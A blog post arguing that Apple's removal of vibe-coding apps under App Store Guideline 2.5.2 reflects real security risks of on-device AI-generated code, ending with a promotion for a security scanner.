Last week, Apple removed "Anything" from the App Store. The startup had raised $11M at a $100M valuation. Gone overnight.
Replit and Vibecode are also blocked from releasing updates.
The tech press is calling it anticompetitive. X is full of takes about Apple killing innovation. The narrative is simple: Apple wants you to use Xcode with their AI tools, not third-party vibe coding apps.
But here's what nobody's talking about: Apple cited Guideline 2.5.2. And that's a security rule, not a competition rule.
What Guideline 2.5.2 Actually Says
"Apps should be self-contained in their bundles, and may not read or write data outside the designated container area, nor may they download, install, or execute code which introduces or changes features or functionality of the app."
Vibe coding apps, by definition, do exactly what this rule prohibits. They download code, execute it, and change app functionality on the fly. That's the entire product.
This isn't arbitrary. The rule exists because dynamic code execution is a security nightmare.
The Security Data Nobody's Citing
While everyone debates whether Apple is being anticompetitive, here's what's happening in the vibe coding security space:
- 35 new CVEs in March 2026 traced directly to AI-generated code vulnerabilities
- escape.tech scanned 5,600 live vibe-coded apps and found hundreds with exposed API keys and secrets
- UK's NCSC CEO called for vibe coding safeguards at RSA Conference this week
- Trend Micro published their vibe coding risk analysis yesterday, calling it a "real and growing threat"
- Harvard Gazette ran a piece today noting that vibe coders "don't typically need to concern themselves" with reliability, safety, and security
The problem is real. The question is whether banning apps is the right solution.
Why Vibe Coding Apps Are Uniquely Risky on iOS
Traditional iOS apps go through App Review. Apple scans them for malware, policy violations, and common security issues.
Vibe coding apps bypass this by generating code on-device after approval. The app that passes review is not the app users actually run. Whatever Claude or Codex generates next week isn't subject to any review.
This creates a few problems:
- Prompt injection attacks can generate malicious code without user awareness
- Supply chain vulnerabilities in the underlying LLMs propagate to every app built with them
- No static analysis is possible on code that doesn't exist until runtime
- Exposed secrets are common because vibe coders often don't know to protect them
Apple's Real Mistake
Apple is right that there's a security problem. They're wrong about the solution.
Banning apps doesn't fix the underlying vulnerability. It just pushes vibe coding to the web, where the same apps can run without any review at all.
A better approach:
- Sandbox the generated code more aggressively
- Require on-device code review before execution
- Mandate secret scanning before deployment
- Create a certification program for vibe coding platforms that meet security standards
Instead, Apple took the easy path: ban first, figure it out later.
What This Means for Vibe Coders
If you're building with Lovable, Bolt, Cursor, or any other AI coding tool:
Your iOS distribution options just narrowed. Web apps and PWAs are still fine. Native iOS apps generated by vibe coding tools face an uncertain future.
Security scanning is now mandatory. If you're shipping anything, you need to run a security scan. Tools like VibeCheck, Aikido, or ChakraView can catch exposed secrets and common vulnerabilities.
The regulatory spotlight is coming. If Apple is cracking down, expect the EU, UK, and others to start asking questions about AI-generated code quality.
The vibe coding gold rush isn't over. But the "ship fast, worry later" phase might be.
Building something with AI coding tools? VibeCheck is a free security scanner for vibe-coded apps. Paste your GitHub URL or deployed site, get a security grade in seconds.
Follow @solobillionsHQ for daily vibe coding security updates.
Top comments (0)